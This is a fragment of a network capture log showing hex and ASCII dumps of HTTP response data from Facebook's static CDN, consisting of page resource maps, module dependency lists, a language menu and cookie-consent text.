                                                                                                                                  2022-10-17 20:07:24 UTC1680INData Raw: 75 74 56 6a 51 7a 4f 57 2d 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6e 7a 41 4b 76 4c 79 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 37 5c 2f 72 5c 2f 36 57 50 4a 79 70 35 48 61 30 6a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 57 46 4d 47 53 39 65 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 5f 6a 41 34 5c 2f 79 7a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 61 73 43 69 42 53 75 68 62 6a
                                                                                                                                  Data Ascii: utVjQzOW-.css?_nc_x=Ij3Wp8lg5Kz"},"nzAKvLy":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y7\/r\/6WPJyp5Ha0j.js?_nc_x=Ij3Wp8lg5Kz"},"WFMGS9e":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i_jA4\/yz\/l\/en_US\/asCiBSuhbj
                                                                                                                                  2022-10-17 20:07:24 UTC1682INData Raw: 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 53 57 78 33 79 4e 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 4f 5f 53 6a 64 63 52 2d 78 4b 4c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 30 5c 2f 72 5c 2f 66 4e 33 63 43 6a 37 49 6c 34 44 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d
                                                                                                                                  Data Ascii: s?_nc_x=Ij3Wp8lg5Kz"},"SWx3yNv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/O_SjdcR-xKL.js?_nc_x=Ij3Wp8lg5Kz"},"x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y0\/r\/fN3cCj7Il4D.js?_nc_x=Ij3Wp8lg5Kz"}
                                                                                                                                  2022-10-17 20:07:24 UTC1683INData Raw: 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 53 75 62 6d 69 74 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 72 68 32 4a 47 30 55 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 2b 52 47 74 4d 30 6f 22 2c 22 6a 54 58
                                                                                                                                  Data Ascii: ,"be":1},"Form":{"r":["vcBcJjw","Z2GjVu9","vGt2mxz","hyKmpuu"],"be":1},"FormSubmit":{"r":["vcBcJjw","EF1hWl5","Z2GjVu9","n6W4xMH","vGt2mxz","rh2JG0U","hyKmpuu"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED"],"r":["+RGtM0o","jTX
                                                                                                                                  2022-10-17 20:07:24 UTC1683INData Raw: 31 65 33 63 0d 0a 65 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 32 5c 2f 6d 61 51 5c 2f 51 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 5c 2f 6f 35 59 76 4f 32 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 6f 67 67 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 6f 6f 6c 74 69 70 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 63 68 58 77 50 72 55 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 45 46 31
                                                                                                                                  Data Ascii: 1e3ce":{"r":["vcBcJjw","2\/maQ\/Q","e9ANzw\/","n6W4xMH","vGt2mxz","\/o5YvO2","hyKmpuu"],"be":1},"Toggler":{"r":["vcBcJjw","+RGtM0o","PMEs\/oy","KAjbrl\/","hyKmpuu","lWOvGTa","n6W4xMH","vGt2mxz"],"be":1},"Tooltip":{"r":["vcBcJjw","chXwPrU","R5w1rCJ","EF1
                                                                                                                                  2022-10-17 20:07:24 UTC1685INData Raw: 22 2c 22 75 64 69 74 64 6f 71 22 2c 22 5a 38 7a 36 59 6f 30 22 2c 22 64 5a 76 4c 69 6b 68 22 2c 22 6e 4d 46 57 7a 4c 58 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 48 4e 4a 6c 7a 30 66 22 2c 22 63 59 55 33 63 33 32 22 2c 22 33 4f 67 53 4a 45 34 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 6f 77 65 73 41 33 50 22 2c 22 55 66 71 36 59 57 58 22 2c 22 41 70 47 35 56 4b 34 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 47 61 74 69 6e 67 22 2c 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 5d 7d 2c 22
                                                                                                                                  Data Ascii: ","uditdoq","Z8z6Yo0","dZvLikh","nMFWzLX","Yv35Of2","HNJlz0f","cYU3c32","3OgSJE4","sjCQeza","owesA3P","Ufq6YWX","ApG5VK4"],"rds":{"m":["Animation","VisualCompletionGating","FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions"]},"
                                                                                                                                  2022-10-17 20:07:24 UTC1686INData Raw: 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 41 63 6d 5a 31 35 6d 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 6c 77 54 35 51 78 77 22 2c 22 52 4d 34 4d 52 34 6e 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 41 39 63 69 56 42 39 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 39 79 6f 4e 79 58 58 22 2c 22 4c 70
                                                                                                                                  Data Ascii: "rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"]},"be":1},"AsyncDialog":{"r":["vcBcJjw","AcmZ15m","R5w1rCJ","ZEC4RrQ","EF1hWl5","lwT5Qxw","RM4MR4n","+RGtM0o","A9ciVB9","X9nr65a","PMEs\/oy","KAjbrl\/","Z2GjVu9","hyKmpuu","o\/unyrn","eMkMxHZ","9yoNyXX","Lp
                                                                                                                                  2022-10-17 20:07:24 UTC1688INData Raw: 6c 63 6f 45 76 65 6e 74 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 45 78 63 65 70 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 5a 36 4b 4e 6e 34 51 22 2c 22 76 63 42 63 4a 6a 77 22 2c 22 41 63 6d 5a 31 35 6d 22 2c 22 5c 2f 48 56 34 42 34 58 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 6c 77 54 35 51 78 77 22 2c 22 52 4d 34 4d 52 34 6e 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 41 39 63 69 56 42 39 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 68 79
                                                                                                                                  Data Ascii: lcoEvent","Animation","PageTransitions","BanzaiScuba_DEPRECATED"]},"be":1},"ExceptionDialog":{"r":["Z6KNn4Q","vcBcJjw","AcmZ15m","\/HV4B4X","R5w1rCJ","ZEC4RrQ","EF1hWl5","lwT5Qxw","RM4MR4n","+RGtM0o","A9ciVB9","X9nr65a","PMEs\/oy","KAjbrl\/","Z2GjVu9","hy
                                                                                                                                  2022-10-17 20:07:24 UTC1689INData Raw: 6c 5c 2f 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 6f 77 65 73 41 33 50 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 46 6f 6f 74 65 72 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 5c 2f 48 56 34 42 34 58 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 75 64 69 74 64 6f 71 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 6f 77 65 73 41 33 50 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 54 69 74 6c 65 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 52 35 77 31 72 43 4a
                                                                                                                                  Data Ascii: l\/","o\/unyrn","Yv35Of2","sjCQeza","owesA3P"],"be":1},"XUIDialogFooter.react":{"r":["vcBcJjw","\/HV4B4X","R5w1rCJ","PMEs\/oy","KAjbrl\/","hyKmpuu","o\/unyrn","uditdoq","Yv35Of2","sjCQeza","owesA3P"],"be":1},"XUIDialogTitle.react":{"r":["vcBcJjw","R5w1rCJ
                                                                                                                                  2022-10-17 20:07:24 UTC1691INData Raw: 69 6e 65 22 3a 5b 5b 22 4c 69 6e 6b 73 68 69 6d 48 61 6e 64 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 75 70 70 6f 72 74 73 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 3a 74 72 75 65 2c 22 64 65 66 61 75 6c 74 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 73 77 69 74 63 68 65 64 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 22 2c 22 6e 6f 6e 5f 6c 69 6e 6b 73 68 69 6d 5f 6c 6e 66 62 5f 6d 6f 64 65 22 3a 6e 75 6c 6c 2c 22 6c 69 6e 6b 5f 72 65 61 63 74 5f 64 65 66 61 75 6c 74 5f 68 61 73 68 22 3a 22 41 54 33 78 35 4c 4a 41 42 6f 49 49 4c 34 6d 2d 4c 47 4d 33 4c 62 6e 4b 44 74 0d 0a 31 62 39 65 0d 0a 41
                                                                                                                                  Data Ascii: ine":[["LinkshimHandlerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","non_linkshim_lnfb_mode":null,"link_react_default_hash":"AT3x5LJABoIIL4m-LGM3LbnKDt1b9eA
                                                                                                                                  2022-10-17 20:07:24 UTC1692INData Raw: 5f 52 78 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 30 78 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 79 47 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 61 30 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 4b 57 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 32 59 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 65 5f 44 56 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 66 5f 4f 34 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 57 64 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 69 4d 22 2c 22 5f 5f 6d 61 72 6b
                                                                                                                                  Data Ascii: _Rx","__markup_3310c079_0_9_0x","__markup_3310c079_0_a_yG","__markup_3310c079_0_b_a0","__markup_3310c079_0_c_KW","__markup_3310c079_0_d_2Y","__markup_3310c079_0_e_DV","__markup_3310c079_0_f_O4","__markup_3310c079_0_g_Wd","__markup_3310c079_0_h_iM","__mark
                                                                                                                                  2022-10-17 20:07:24 UTC1694INData Raw: 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 57 69 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 73 5f 4c 41 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33
                                                                                                                                  Data Ascii: r":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_4_Wi"},"label":"English (US)","title":"","className":"headerItem"},{"class":"headerItem","value":"es_LA","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_33
                                                                                                                                  2022-10-17 20:07:24 UTC1695INData Raw: 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 6c 5f 50 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 4b 57 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 6c 73 6b 69 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 74 5f 42 52 22 2c 22 73 65 6c 65 63 74 65
                                                                                                                                  Data Ascii: Name":"headerItem"},{"class":"headerItem","value":"pl_PL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_c_KW"},"label":"Polski","title":"","className":"headerItem"},{"class":"headerItem","value":"pt_BR","selecte
                                                                                                                                  2022-10-17 20:07:24 UTC1696INData Raw: 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 6c 58 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 54 5c 75 30 30 66 63 72 6b 5c 75 30 30 65 37 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 63 73 5f 43 5a 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6b 5f 62 51 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 31 30 63 65 5c 75
                                                                                                                                  Data Ascii: p":{"__m":"__markup_3310c079_0_j_lX"},"label":"T\u00fcrk\u00e7e","title":"","className":"headerItem"},{"class":"headerItem","value":"cs_CZ","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_k_bQ"},"label":"\u010ce\u
                                                                                                                                  2022-10-17 20:07:24 UTC1698INData Raw: 32 39 66 30 0d 0a 70 5f 45 39 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c 75 30 39 32 38 5c 75 30 39 34 64 5c 75 30 39 32 36 5c 75 30 39 34 30 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 68 5f 54 48 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 4d 48 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 65 32 30 5c 75 30 65 33 32 5c 75
                                                                                                                                  Data Ascii: 29f0p_E9"},"label":"\u0939\u093f\u0928\u094d\u0926\u0940","title":"","className":"headerItem"},{"class":"headerItem","value":"th_TH","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_q_MH"},"label":"\u0e20\u0e32\u
                                                                                                                                  2022-10-17 20:07:24 UTC1699INData Raw: 64 31 65 35 36 35 5f 30 5f 30 5f 50 68 22 2c 5b 22 44 69 61 6c 6f 67 58 22 2c 22 4c 61 79 65 72 46 61 64 65 4f 6e 48 69 64 65 22 2c 22 44 69 61 6c 6f 67 48 69 64 65 4f 6e 53 75 63 63 65 73 73 22 2c 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 76 48 22 2c 22 48 54 4d 4c 22 5d 2c 5b 7b 22 77 69 64 74 68 22 3a 36 38 30 2c 22 61 75 74 6f 68 69 64 65 22 3a 6e 75 6c 6c 2c 22 74 69 74 6c 65 49 44 22 3a 6e 75 6c 6c 2c 22 72 65 64 69 72 65 63 74 55 52 49 22 3a 6e 75 6c 6c 2c 22 66 69 78 65 64 54 6f 70 50 6f 73 69 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 69 67 6e 6f 72 65 46 69 78 65 64 54 6f 70 49 6e 53 68 6f 72 74
                                                                                                                                  Data Ascii: d1e565_0_0_Ph",["DialogX","LayerFadeOnHide","DialogHideOnSuccess","LayerHideOnTransition","LayerRemoveOnHide","__markup_9f5fac15_0_0_vH","HTML"],[{"width":680,"autohide":null,"titleID":null,"redirectURI":null,"fixedTopPosition":null,"ignoreFixedTopInShort
                                                                                                                                  2022-10-17 20:07:24 UTC1701INData Raw: 20 73 78 5f 35 37 37 63 36 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 36 61 20 75 69 50 6f 70 6f 76 65 72 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 37 5f 5a 47 5c 22 3e 5c 75 30 30 33 43 61 20 72 6f 6c 65 3d 5c 22 62 75 74 74 6f 6e 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 35 70 69 20 5f 32 61 67 66 20 5f 34 6f 5f 34 20 5f 39 6f 2d 65 20 5f 70 20 5f 34 6a 79 33 20 5f 35 31 37 68 20 5f 35 31 73 79 5c 22 20 68 72 65 66 3d 5c 22 23 5c 22 20 73 74 79 6c 65 3d 5c 22 6d 61 78 2d 77 69 64 74 68 3a 32 30 30 70 78 3b 5c 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 5c 22 74 72 75 65 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 5c 22 66 61 6c 73 65 5c 22 20 72 65 6c 3d 5c 22
                                                                                                                                  Data Ascii: sx_577c60\">\u003C\/i>\u003Cdiv class=\"_6a uiPopover\" id=\"u_0_7_ZG\">\u003Ca role=\"button\" class=\"_42ft _4jy0 _55pi _2agf _4o_4 _9o-e _p _4jy3 _517h _51sy\" href=\"#\" style=\"max-width:200px;\" aria-haspopup=\"true\" aria-expanded=\"false\" rel=\"
                                                                                                                                  2022-10-17 20:07:24 UTC1702INData Raw: 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65 20 75 73 65 20 74 6f 6f 6c 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 33 5c 22 3e 59 6f 75 20 63 61 6e 20 61 6c 6c 6f 77 20 74 68 65 20 75 73 65 20 6f 66 20 61 6c 6c 20 63 6f 6f 6b 69 65 73 2c 20 6a 75 73 74 20 65 73 73
                                                                                                                                  Data Ascii: ook Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv class=\"_9xo3\">You can allow the use of all cookies, just ess
                                                                                                                                  2022-10-17 20:07:24 UTC1704INData Raw: 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 39 5f 69 47 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75
                                                                                                                                  Data Ascii: div class=\"_9vtg\" id=\"u_0_9_iG\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">More information\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u
